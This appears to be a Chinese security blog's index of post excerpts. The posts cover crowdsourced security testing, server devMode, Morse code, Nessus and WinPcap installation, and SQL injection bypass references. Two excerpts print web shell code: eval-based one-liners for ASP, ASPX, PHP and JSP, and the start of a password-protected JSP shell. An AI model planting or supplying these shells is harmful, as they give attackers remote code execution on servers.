摘要： 干将莫邪也为凡铁铸成，只是善加锻造、融入心神，而成上古神兵。宝剑从来都是双刃，正邪之道，存乎一心。 阅读全文

摘要： 随着众包（Crowd-sourcing）模式的兴起和发展，安全测试也进入了这一领域，对于中小企业来说，使用众包模式进行安全测试，相对自行组建安全团队或者购买安全服务更能节约成本，提高效率。目前国内有2大安全众测平台：漏洞盒子、Sobug白帽众测。所谓安全众测，就是众包（Crowd-sourcing） 阅读全文

摘要： asp一句话：<%eval request("1.2.3")%>aspx一句话：<%@ Page Language="Jscript"%><%eval(Request.Item["1.2.3"])%>php一句话：<?php eval($_POST[1.2.3])?>jsp一句话：<%if(requ 阅读全文

摘要： <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="1.2.3";String EC(String s,String c)throws Exception{return ne 阅读全文

摘要： 在实际应用开发或者是产品部署的时候，对应着两种模式：1、开发模式（devMode），此时，DevMode=true2、产品模式(proMode)，此时，DevMode=false在一些服务器或者框架中也存在着这两种模式，例如：tomcat、struts2等，在这两种不同的模式下，他们运行的性能方面有 阅读全文

摘要： morse code，摩斯电码，是一种时通时断的信号代码，通过不同的排列顺序来表达不同的英文字母、数字和标点符号。 摩斯电码，是一种早期的数字化通信形式，但是它不同于现代只使用0和1两种状态的二进制代码，它的代码包括5种： 点、划、点和划之间的停顿、每个字符间短的停顿（在点和划之间）、每个词之间中等 阅读全文

摘要： 0x1，安装 百度：Nessus，随意下载一个就好了. 0x2，激活 开启代理，获取register code，如图： 获取到register code，填写，进行激活，意外报错： NOTICE: An unexpected error occurred while downloading the 阅读全文

摘要： 360软件管家提示把WinPcap更新至版本：4.1.0.2980，于是把旧版下载后，可新版本怎么也无法顺利安装，出现以下信息，旧版本已安装，关闭所有winpcap-based应用程序和再次运行安装程序，明明已没有相应程序可运行了呀,怎么回事呢？ 百度搜索后采用很多建议都没成功，在国外网站看到如下信 阅读全文

摘要： 1.换手机号前，谨防泄密 ①修改支付宝账号绑定 登陆支付宝账户—点击账户设置—基本信息—手机—解绑。 ②解绑微信账户 登陆微信，选择"我"—设置—账号与安全—手机号码—选择右上角菜单—解绑 ③解绑银行卡 一般可通过网银专业版或者柜台解绑，同时更换u盾，网上银行，手机银行，短信通知等业务 ④更改其他账 阅读全文

摘要： 非常好的一本手册，讲了一些注入的一些手法，涉及到的数据库有：MySQL、MSSQL、ORACLE等. 0x1.http://websec.ca/kb/sql_injection 文章主要讲了一些常见混淆和绕过注入的手法. 0x2.https://exploit-db.com/papers/17934 阅读全文